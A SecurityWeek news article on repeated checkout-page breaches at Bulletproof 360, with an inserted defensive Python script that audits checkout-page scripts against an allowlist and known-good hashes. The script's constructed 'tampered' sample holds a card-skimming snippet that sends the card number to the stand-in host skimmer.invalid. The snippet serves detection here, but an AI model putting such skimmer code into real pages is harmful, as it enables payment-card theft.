Bulletproof Coffee Failed to Keep Hackers Out

Bulletproof 360, the Bellevue, Wash.-based company that offers Bulletproof coffee and dietary supplements, is having trouble keeping cybercriminals out of its systems. The firm has sent out several notifications in the past year informing customers that hackers may have obtained their personal and payment card information.

Bulletproof has only three physical stores, in Seattle and Los Angeles, but many people buy the company’s products from its website, which appears to have been breached several times in the past year.

The company first discovered that hackers had broken into its website on February 23, 2017. An investigation revealed that cybercriminals had compromised Bulletproof’s e-commerce system and may have obtained payment card data submitted by users who had made online purchases, including names, card numbers, expiration dates and CVVs. The exposed data also included email addresses, physical addresses and phone numbers.

An initial investigation found that the hackers had access to Bulletproof’s systems from October 26, 2016 until January 31, 2017. However, the final forensics report revealed that the attackers actually had access until May 30, 2017, which triggered a second breach notification for the period between February and May 2017.

Bulletproof then initiated another internal investigation, which showed that hackers had compromised the checkout page on its website, bulletproof.com, in an effort to capture payment card data submitted by customers making online purchases. This time, the attackers appeared to have had access between August 28, 2017 and September 5, 2017.

In the notifications sent out on September 15, the company told customers that it had “implemented enhanced security measures, including installing a new website security platform, implementing a security information and event management system (SIEM), and implementing enhanced logging” in an effort to prevent future incidents.

However, the new security measures did not help much, and this week Bulletproof started sending out a new round of data breach notifications. It turns out that cybercriminals may also have intercepted information submitted to the company via the checkout page on its website between May 20 and October 13, 2017, and between October 15 and 19, 2017.
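Every incident described above involved code placed on the checkout page to capture card data as customers typed it in, and the company’s stated response was better logging and a SIEM. A complementary control that catches this class of tampering directly is an integrity audit of the scripts served on the checkout page: external script sources are compared against an allowlist, and inline scripts are hashed against a known-good copy, so a newly injected script or an altered one is flagged before it has months to harvest cards. The script below is an added example written for this article, not code from Bulletproof or from any of its security vendors; the allowlisted hosts, both sample pages and the reserved domain skimmer.invalid are constructed for illustration and the real checkout page would be fetched over HTTPS instead.

```python
"""Checkout page script-integrity audit (added example, not Bulletproof's code)."""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptCollector(HTMLParser):
    """Collect every <script> on a page: external src values and inline bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._capturing = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src.strip())
        else:
            self._capturing = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> content as raw data, possibly in chunks.
        if self._capturing:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._capturing:
            self.inline.append("".join(self._buf).strip())
            self._capturing = False


def collect_scripts(html):
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.external, parser.inline


def inline_script_hashes(html):
    """SHA-256 of each inline script; run this on a known-good copy to build the baseline."""
    _, inline = collect_scripts(html)
    return {hashlib.sha256(body.encode("utf-8")).hexdigest() for body in inline}


def audit_checkout_page(html, allowed_hosts, baseline_hashes):
    """Return (finding, detail) pairs for scripts the allowlist and baseline do not account for."""
    external, inline = collect_scripts(html)
    findings = []
    for src in external:
        parts = urlsplit(src)
        if parts.scheme not in ("", "http", "https"):
            # data:, javascript: and similar schemes have no business on a checkout page
            findings.append(("unexpected_script_scheme", src))
        elif parts.hostname is not None and parts.hostname.lower() not in allowed_hosts:
            # covers protocol-relative "//host/x.js" as well as absolute URLs
            findings.append(("unexpected_script_host", src))
        # a relative src has no host and is first-party; its content is covered by deploy review
    for body in inline:
        digest = hashlib.sha256(body.encode("utf-8")).hexdigest()
        if digest not in baseline_hashes:
            findings.append(("unknown_inline_script", digest))
    return findings


# Assumed allowlist: the site's own host plus one CDN (constructed for this example).
ALLOWED_SCRIPT_HOSTS = {"www.bulletproof.com", "cdn.example"}

# Constructed known-good checkout page used to build the baseline.
KNOWN_GOOD_CHECKOUT = """<html><body>
<form id="checkout"><input name="card_number"><input name="cvv"></form>
<script src="https://cdn.example/checkout.js"></script>
<script>window.checkoutReady = true;</script>
</body></html>"""

# Constructed "after tampering" copy: one added third-party script and an altered
# inline script that beacons the card number out. skimmer.invalid is a reserved name.
TAMPERED_CHECKOUT = """<html><body>
<form id="checkout"><input name="card_number"><input name="cvv"></form>
<script src="https://cdn.example/checkout.js"></script>
<script src="//skimmer.invalid/s.js"></script>
<script>window.checkoutReady = true; document.forms[0].onsubmit = function () {
  new Image().src = "https://skimmer.invalid/c?d=" + encodeURIComponent(this.card_number.value);
};</script>
</body></html>"""


if __name__ == "__main__":
    baseline = inline_script_hashes(KNOWN_GOOD_CHECKOUT)
    for name, page in (("known-good", KNOWN_GOOD_CHECKOUT), ("tampered", TAMPERED_CHECKOUT)):
        print(name, audit_checkout_page(page, ALLOWED_SCRIPT_HOSTS, baseline) or "clean")
```

Run on a schedule from outside the web tier, this turns a months-long dwell time into a same-day alert, and the findings are exactly the kind of event a SIEM should ingest. The baseline must be rebuilt on every legitimate deploy, or every release will page the on-call; the caveat is that it audits only what the server sends, so a skimmer loaded indirectly by an allowlisted third-party script still needs Subresource Integrity or a strict Content Security Policy on the checkout page.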

The company has promised to reimburse affected customers for costs incurred as a result of these breaches if their financial institution refuses to reimburse them. It remains to be seen if this is the last breach notice sent out by the company or if hackers will gain access to its systems once again – if they haven’t done so already.

UPDATE. Bulletproof has sent SecurityWeek the following statement:

We became aware of a security incident involving our ecommerce website after noticing unusual activity relating to customer online transactions. We then began an immediate investigation of our website, engaged three computer security firms to examine our systems for any signs of an issue, and notified law enforcement. Our investigation earlier determined that an unknown third party had compromised our e-commerce system, potentially affecting customer payment card information used for online transactions on Bulletproof’s e-commerce website from October 26, 2016 to May 30, 2017. Working with the security firms, we recently determined that payment card information used on our ecommerce website from October 26, 2016 through October 13, 2017 and from October 15-19, 2017 may have been compromised. We immediately removed the code and have notified potentially affected customers of the incident.

Protecting our customers’ information remains a top priority and we regret any inconvenience or concern this may cause our customers. We recognize the importance of protecting our customers’ payment card information. We are continuing to work with the three security firms to implement enhanced security measures to try to prevent a similar incident from happening in the future.

Eduard Kovacs is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.